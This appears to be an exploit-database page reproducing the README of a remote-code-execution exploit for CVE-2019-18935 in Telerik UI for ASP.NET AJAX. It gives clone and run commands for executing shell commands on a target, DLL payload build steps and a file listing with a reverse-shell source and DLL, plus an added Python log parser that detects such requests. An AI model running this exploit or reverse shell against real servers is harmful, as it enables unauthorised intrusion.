Related vulnerabilities
Description
Exploit for CVE-2019-18935
Introduction
# CVE-2019-18935 Exploit
Remote code execution exploit for Telerik UI for ASP.NET AJAX through an insecure deserialization vulnerability.
## How to Run
### Step 1: Clone the Project
```bash
git clone https://github.com/menashe12346/CVE-2019-18935.git
cd CVE-2019-18935
```
### Step 2: In `CVE-2019-18935.py`, modify line 15:
```python
version = "2017.1.228" # Replace with target server's Telerik version
```
### Step 3: Run the Exploit
```bash
python CVE-2019-18935.py <target_url> <shell_command>
# Example:
python CVE-2019-18935.py "http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau" "whoami"
```
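From the defender's side, the request in Step 3 goes to the `Telerik.Web.UI.WebResource.axd?type=rau` handler, so it leaves a trace in the web server's access log. The following is an added example, not part of the original repository, that flags such requests in IIS W3C-format logs; the sample log lines are constructed and the column layout is assumed to come from the log's own `#Fields:` header.

```python
from urllib.parse import parse_qs

HANDLER = "telerik.web.ui.webresource.axd"  # handler name from the README's example URL

# Constructed sample in IIS W3C extended format (documentation-range addresses).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2024-01-10 08:00:01 198.51.100.7 GET /default.aspx - 200
2024-01-10 08:00:05 203.0.113.9 GET /Telerik.Web.UI.WebResource.axd type=rau 200
2024-01-10 08:00:06 203.0.113.9 POST /Telerik.Web.UI.WebResource.axd type=rau 200
2024-01-10 08:00:09 198.51.100.7 GET /Telerik.Web.UI.WebResource.axd _TSM_HiddenField_=x 200
2024-01-10 08:00:12 203.0.113.9 POST /app/TELERIK.WEB.UI.WEBRESOURCE.AXD a=1&TYPE=RAU 500
"""

def find_rau_requests(log_text):
    """Return one dict per request to the RadAsyncUpload (type=rau) handler."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the lines that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        # IIS matches handler paths case-insensitively, so normalise before comparing.
        stem = row.get("cs-uri-stem", "").lower()
        query = parse_qs(row.get("cs-uri-query", "").lower())
        if not stem.endswith("/" + HANDLER) or "rau" not in query.get("type", []):
            continue
        method = row.get("cs-method", "")
        hits.append({
            "time": f'{row.get("date")} {row.get("time")}',
            "client": row.get("c-ip"),
            "method": method,
            "status": row.get("sc-status"),
            # A POST carries an upload body; a GET does not.
            "severity": "high" if method == "POST" else "low",
        })
    return hits

def clients_to_review(hits):
    """Client IPs that sent at least one POST to the handler."""
    return sorted({h["client"] for h in hits if h["severity"] == "high"})

if __name__ == "__main__":
    found = find_rau_requests(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print("review:", clients_to_review(found))
```

Applications that legitimately use RadAsyncUpload also POST to this handler, so treat hits as leads to correlate with the installed Telerik version rather than as confirmed compromise.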
🔧 **Building Custom DLL Files**
To create a DLL from a different C file (not just the reverse shell):
Install Visual Studio (Desktop development with C++) with these components:
- MSVC v143 - VS 2022 C++ x64/x86 build tools
- Windows 11 SDK
- C++ CMake tools for Windows
- C++ AddressSanitizer
Build the DLL:
```bat
build-dll.bat your_file.c
```
The DLL will be created in the `payloads/` directory.
📋 **File Descriptions**
```
CVE-2019-18935_exploit/
├── CVE-2019-18935.py # Main exploit code
├── RAU_crypto.py # Telerik encryption/decryption module
├── build-dll.bat # Script to build DLL files from C code
├── reverse-shell.c # C source code for reverse shell
└── payloads/ # Directory for compiled DLL payload files
```
---
File snapshot
[4.0K] /data/pocs/c1d949f059b352f00033ed7f56af9a5a28563fe9
├── [1.9K] build-dll.bat
├── [4.9K] CVE-2019-18935.py
├── [4.0K] payloads
│ └── [110K] reverse-shell-2025102319140360-x86.dll
├── [ 14K] RAU_crypto.py
├── [1.4K] README.md
└── [1.6K] reverse-shell.c
1 directory, 6 files